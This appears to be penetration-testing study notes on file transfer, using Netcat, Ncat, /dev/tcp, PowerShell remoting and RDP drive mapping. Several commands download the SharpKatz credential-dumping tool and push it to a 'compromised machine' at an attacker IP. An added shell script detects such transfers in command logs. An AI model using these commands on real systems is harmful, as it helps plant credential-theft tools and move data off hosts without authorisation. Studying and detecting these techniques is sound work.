Miscellaneous File Transfer Methods


Netcat

Netcat - Compromised Machine - Listening on Port 8000

nc -l -p 8000 > SharpKatz.exe

Netcat - Attack Host - Sending File to Compromised Machine

wget -q https://github.com/Flangvik/SharpCollection/raw/master/NetFramework_4.7_x64/SharpKatz.exe
nc -q 0 192.168.49.128 8000 < SharpKatz.exe

Attack Host - Sending File as Input to Netcat

sudo nc -l -p 443 -q 0 < SharpKatz.exe

Compromised Machine Connecting to Netcat to Receive the File

nc 192.168.49.128 443 > SharpKatz.exe

Netcat - Sending File as Input to Netcat

sudo nc -l -p 443 -q 0 < SharpKatz.exe

Compromised Machine Connecting to Netcat Using /dev/tcp to Receive the File

cat < /dev/tcp/192.168.49.128/443 > SharpKatz.exe

Ncat

Ncat - Compromised Machine - Listening on Port 8000

ncat -l -p 8000 --recv-only > SharpKatz.exe

Ncat - Attack Host - Sending File to Compromised Machine

wget -q https://github.com/Flangvik/SharpCollection/raw/master/NetFramework_4.7_x64/SharpKatz.exe
ncat --send-only 192.168.49.128 8000 < SharpKatz.exe

Attack Host - Sending File as Input to Ncat

sudo ncat -l -p 443 --send-only < SharpKatz.exe

Compromised Machine Connecting to Ncat to Receive the File

ncat 192.168.49.128 443 --recv-only > SharpKatz.exe

Ncat - Sending File as Input to Ncat

sudo ncat -l -p 443 --send-only < SharpKatz.exe
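
Detection Note

From the defender's side, the Netcat, Ncat and /dev/tcp transfers above leave a recognizable shape in shell command logs. The following is an added example, not part of the original notes: a POSIX shell classifier run over a constructed log. The host names web01 and kali01, the "host command" log format and the function names are assumptions.

```sh
# Added example: flag raw-TCP file transfers in a shell command audit log.
# Assumes each log line holds the full command as typed, including
# redirections (shell auditing or history), not just execve() arguments.

# classify_cmd "<command line>" -> prints one label, or "none"
classify_cmd() {
    cmd=$1
    # bash's /dev/tcp pseudo-device: a socket opened with no nc binary at all
    if printf '%s\n' "$cmd" | grep -Eq '/dev/(tcp|udp)/[^/ ]+/[0-9]+'; then
        echo devtcp; return
    fi
    # nc, ncat or netcat invoked as a command word
    printf '%s\n' "$cmd" | grep -Eq '(^|[ /;|&])(nc|ncat|netcat)( |$)' \
        || { echo none; return; }
    role=connect
    printf '%s\n' "$cmd" | grep -Eq ' (-[A-Za-z]*l|--listen)' && role=listen
    # a redirection means file contents cross the socket
    case $cmd in
        *'>'*) echo "$role-recv" ;;
        *'<'*) echo "$role-send" ;;
        *)     echo none ;;
    esac
}

# scan_log: reads "<host> <command...>" lines on stdin, prints only the hits
scan_log() {
    while IFS= read -r line; do
        label=$(classify_cmd "${line#* }")
        [ "$label" = none ] || printf '%-13s %s\n' "$label" "$line"
    done
}

# Constructed sample log (hostname + command), reusing this page's commands
sample_log() {
    cat <<'EOF'
web01 nc -l -p 8000 > SharpKatz.exe
web01 cat < /dev/tcp/192.168.49.128/443 > SharpKatz.exe
web01 nc -zv 10.0.0.5 22
web01 cat notes.txt > backup.txt
kali01 sudo ncat -l -p 443 --send-only < SharpKatz.exe
EOF
}

sample_log | scan_log
```

Process-creation telemetry that records only execve() arguments will not contain the redirection or the /dev/tcp path, so this check belongs on shell-level command logging.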

PowerShell Session File Transfer

From DC01 - Confirm WinRM Port TCP 5985 Is Open on DATABASE01

PS C:\sam> whoami

sam\administrator

PS C:\sam> hostname

DC01

PS C:\sam> Test-NetConnection -ComputerName DATABASE01 -Port 5985

ComputerName     : DATABASE01
RemoteAddress    : 192.168.1.101
RemotePort       : 5985
InterfaceAlias   : Ethernet0
SourceAddress    : 192.168.1.100
TcpTestSucceeded : True

Create a PowerShell Remoting Session to DATABASE01

PS C:\sam> $Session = New-PSSession -ComputerName DATABASE01

Copy samplefile.txt from our Localhost to the DATABASE01 Session

PS C:\sam> Copy-Item -Path C:\samplefile.txt -ToSession $Session -Destination C:\Users\Administrator\Desktop\

Copy DATABASE.txt from DATABASE01 Session to our Localhost

PS C:\sam> Copy-Item -Path "C:\Users\Administrator\Desktop\DATABASE.txt" -Destination C:\ -FromSession $Session

RDP

Mounting a Linux Folder Using rdesktop

rdesktop <ip> -d <domain> -u <user> -p '<pass>' -r disk:linux='<Folder>'

Mounting a Linux Folder Using xfreerdp

xfreerdp /v:<ip> /d:<domain> /u:<user> /p:'<pass>' /drive:linux,<folder>

Note

To access the directory, we can connect to \\tsclient\, allowing us to transfer files to and from the RDP session.